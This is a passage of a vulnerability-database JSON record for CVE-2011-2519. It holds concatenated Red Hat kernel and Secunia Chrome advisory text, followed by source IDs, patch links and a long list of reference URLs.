could\nallow a local, unprivileged user to cause a denial of service. \n(CVE-2011-2491, Important)\n\n* Flaws in the netlink-based wireless configuration interface could allow\na local user, who has the CAP_NET_ADMIN capability, to cause a denial of\nservice or escalate their privileges on systems that have an active\nwireless interface. (CVE-2011-2517, Important)\n\n* A flaw was found in the way the Linux kernel\u0027s Xen hypervisor\nimplementation emulated the SAHF instruction. (CVE-2011-2901, Moderate)\n\n* /proc/[PID]/io is world-readable by default. Previously, these files\ncould be read without any further restrictions. A local, unprivileged user\ncould read these files, belonging to other, possibly privileged processes\nto gather confidential information, such as the length of a password used\nin a process. (CVE-2011-2495, Low)\n\nRed Hat would like to thank Vasily Averin for reporting CVE-2011-2491, and\nVasiliy Kulikov of Openwall for reporting CVE-2011-2495. \n\nThis update also fixes the following bugs:\n\n* On Broadcom PCI cards that use the tg3 driver, the operational state of a\nnetwork device, represented by the value in\n\"/sys/class/net/ethX/operstate\", was not initialized by default. \nConsequently, the state was reported as \"unknown\" when the tg3 network\ndevice was actually in the \"up\" state. This update modifies the tg3 driver\nto properly set the operstate value. (BZ#744699)\n\n* A KVM (Kernel-based Virtual Machine) guest can get preempted by the host,\nwhen a higher priority process needs to run. When a guest is not running\nfor several timer interrupts in a row, ticks could be lost, resulting in\nthe jiffies timer advancing slower than expected and timeouts taking longer\nthan expected. To correct for the issue of lost ticks,\ndo_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when\nrunning as a KVM guest) to see if timer interrupts have been missed. If so,\njiffies is incremented by the number of missed timer interrupts, ensuring\nthat programs are woken up on time. (BZ#747874)\n\n* When a block device object was allocated, the bd_super field was not\nbeing explicitly initialized to NULL. Previously, users of the block device\nobject could set bd_super to NULL when the object was released by calling\nthe kill_block_super() function. Certain third-party file systems do not\nalways use this function, and bd_super could therefore become uninitialized\nwhen the object was allocated again. This could cause a kernel panic in the\nblkdev_releasepage() function, when the uninitialized bd_super field was\ndereferenced. Now, bd_super is properly initialized in the bdget()\nfunction, and the kernel panic no longer occurs. (BZ#751137)\n\n4. Solution:\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. The system must be\nrebooted for this update to take effect. \n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not\nuse \"rpm -Uvh\" as that will remove the running kernel binaries from\nyour system. You may use \"rpm -e\" to remove old kernels after\ndetermining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):\n\n709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing  NFS share\n714867 - CVE-2011-2482 kernel: sctp dos\n716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak\n718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations\n718882 - CVE-2011-2519 kernel: xen: x86_emulate: fix SAHF emulation\n728042 - CVE-2011-2901 kernel: xen: off-by-one shift in x86_64 __addr_ok()\n\n6. Package List:\n\nRed Hat Enterprise Linux EUS (v. 5.6 server):\n\nSource:\nkernel-2.6.18-238.31.1.el5.src.rpm\n\ni386:\nkernel-2.6.18-238.31.1.el5.i686.rpm\nkernel-PAE-2.6.18-238.31.1.el5.i686.rpm\nkernel-PAE-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-PAE-devel-2.6.18-238.31.1.el5.i686.rpm\nkernel-debug-2.6.18-238.31.1.el5.i686.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.i686.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.i686.rpm\nkernel-devel-2.6.18-238.31.1.el5.i686.rpm\nkernel-headers-2.6.18-238.31.1.el5.i386.rpm\nkernel-xen-2.6.18-238.31.1.el5.i686.rpm\nkernel-xen-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-xen-devel-2.6.18-238.31.1.el5.i686.rpm\n\nia64:\nkernel-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debug-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.ia64.rpm\nkernel-devel-2.6.18-238.31.1.el5.ia64.rpm\nkernel-headers-2.6.18-238.31.1.el5.ia64.rpm\nkernel-xen-2.6.18-238.31.1.el5.ia64.rpm\nkernel-xen-debuginfo-2.6.18-238.31.1.el5.ia64.rpm\nkernel-xen-devel-2.6.18-238.31.1.el5.ia64.rpm\n\nnoarch:\nkernel-doc-2.6.18-238.31.1.el5.noarch.rpm\n\nppc:\nkernel-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debug-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-devel-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-headers-2.6.18-238.31.1.el5.ppc.rpm\nkernel-headers-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-kdump-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-kdump-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-kdump-devel-2.6.18-238.31.1.el5.ppc64.rpm\n\ns390x:\nkernel-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debug-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.s390x.rpm\nkernel-devel-2.6.18-238.31.1.el5.s390x.rpm\nkernel-headers-2.6.18-238.31.1.el5.s390x.rpm\nkernel-kdump-2.6.18-238.31.1.el5.s390x.rpm\nkernel-kdump-debuginfo-2.6.18-238.31.1.el5.s390x.rpm\nkernel-kdump-devel-2.6.18-238.31.1.el5.s390x.rpm\n\nx86_64:\nkernel-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debug-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-devel-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-headers-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-xen-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-xen-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-xen-devel-2.6.18-238.31.1.el5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-2482.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2491.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2495.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2517.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2519.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2901.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2011 Red Hat, Inc. This fixes some\nweaknesses and vulnerabilities, which can be exploited by malicious,\nlocal users to disclose certain system information, cause a DoS\n(Denial of Service), and gain escalated privileges and by malicious,\nlocal users in a guest virtual machine and malicious people to cause\na DoS. \n\nSuccessful exploitation of this weakness requires that the host\nsystem is not using hardware assisted paging (HAP). ----------------------------------------------------------------------\n\nThe new Secunia Corporate Software Inspector (CSI) 5.0 \nIntegrates with Microsoft WSUS \u0026 SCCM and supports Apple Mac OS X. \n\nGet a free trial now and qualify for a special discount:\nhttp://secunia.com/vulnerability_scanning/corporate/trial/\n\n----------------------------------------------------------------------\n\nTITLE:\nGoogle Chrome Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA46308\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46308/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46308\n\nRELEASE DATE:\n2011-10-06\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46308/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46308/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46308\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in Google Chrome, which\ncan be exploited by malicious people to bypass certain security\nrestrictions and compromise a user\u0027s system. \n\n1) A use-after-free error exists in text line box handling. \n\n2) An error in the SVG text handling can be exploited to reference a\nstale font. \n\n3) An error exists within cross-origin access handling associated\nwith a window prototype. \n\n4) Some errors exist within audio node handling related to lifetime\nand threading. \n\n5) A use-after-free error exists in the v8 bindings. \n\n6) An error when handling v8 hidden objects can be exploited to\ncorrupt memory. \n\n7) An error in the shader translator can be exploited to corrupt\nmemory. \n\nThe vulnerabilities are reported in versions prior to 14.0.835.202. \n\nPROVIDED AND/OR DISCOVERED BY:\nThe vendor credits:\n1, 2) miaubiz\n3, 5, 6) Sergey Glazunov\n4) Inferno, Google Chrome Security Team\n7) Zhenyao Mo, Chromium development community\n\nORIGINAL ADVISORY:\nGoogle:\nhttp://googlechromereleases.blogspot.com/2011/10/stable-channel-update.html\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "BID",
        "id": "49375"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "104863"
      },
      {
        "db": "PACKETSTORM",
        "id": "105568"
      },
      {
        "db": "PACKETSTORM",
        "id": "109261"
      }
    ],
    "trust": 2.79
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-2519",
        "trust": 3.0
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2011/08/30/1",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "49375",
        "trust": 0.9
      },
      {
        "db": "BID",
        "id": "51749",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "47804",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "45897",
        "trust": 0.7
      },
      {
        "db": "SECUNIA",
        "id": "46308",
        "trust": 0.7
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2011:1212",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20130830 KERNEL: CVE-2011-2482/2519",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419",
        "trust": 0.6
      },
      {
        "db": "HITACHI",
        "id": "HS12-005",
        "trust": 0.5
      },
      {
        "db": "SECUNIA",
        "id": "47825",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "109259",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "104843",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "109299",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "107847",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "104863",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "105568",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "109261",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "49375"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "104843"
      },
      {
        "db": "PACKETSTORM",
        "id": "109299"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "104863"
      },
      {
        "db": "PACKETSTORM",
        "id": "105568"
      },
      {
        "db": "PACKETSTORM",
        "id": "109261"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ]
  },
  "id": "VAR-201312-0004",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.225
  },
  "last_update_date": "2022-03-28T12:59:37.660000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug 718882",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=718882"
      },
      {
        "title": "RHSA-2011:1212",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2011-1212.html"
      },
      {
        "title": "Fix SAHF emulation",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=47286"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-518"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-476",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2011-005252"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2519"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "http://xenbits.xen.org/hg/xen-3.1-testing.hg/rev/15644"
      },
      {
        "trust": 1.9,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=718882"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1212.html"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2011/08/30/1"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2519"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2519"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45897"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46308"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/47804"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/49375"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/51749"
      },
      {
        "trust": 0.5,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.4,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.3,
        "url": "http://wiki.openvz.org/download/kernel/rhel5/028stab094.3"
      },
      {
        "trust": 0.3,
        "url": "http://www.vmware.com/security/advisories/vmsa-2012-0001.html"
      },
      {
        "trust": 0.3,
        "url": "http://xen.xensource.com/"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100151103"
      },
      {
        "trust": 0.3,
        "url": "http://www.hds.com/products/storage-software/hitachi-device-manager.html"
      },
      {
        "trust": 0.2,
        "url": "http://secunia.com/company/jobs/"
      },
      {
        "trust": 0.2,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2901.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/kb/docs/doc-11259"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2517"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2901"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2495"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2491"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2495.html"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2482"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2482.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2519"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2519.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2491.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2517.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.2,
        "url": "http://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47804"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47804/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47804/"
      },
      {
        "trust": 0.1,
        "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_linux/5/html/5.7_technical_notes/kernel.html#rhsa-2011-1212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0711"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2495"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2901"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2522"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1166"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1163"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1093"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1780"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2525"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1746"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2192"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4649"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-4649"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1078"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1170"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1745"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1015"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1163"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1936"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1494"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1573"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/go/selfsupport-download"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3560"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2009143"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1763"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1166"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1044"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2482"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3493"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1078"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0711"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1171"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1079"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1521"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1577"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2491"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2059"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1172"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1172"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0726"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2089"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3720"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1678"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1182"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1080"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1080"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1634"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-0695"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1494"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0787"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-0695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2517"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1079"
      },
      {
        "trust": 0.1,
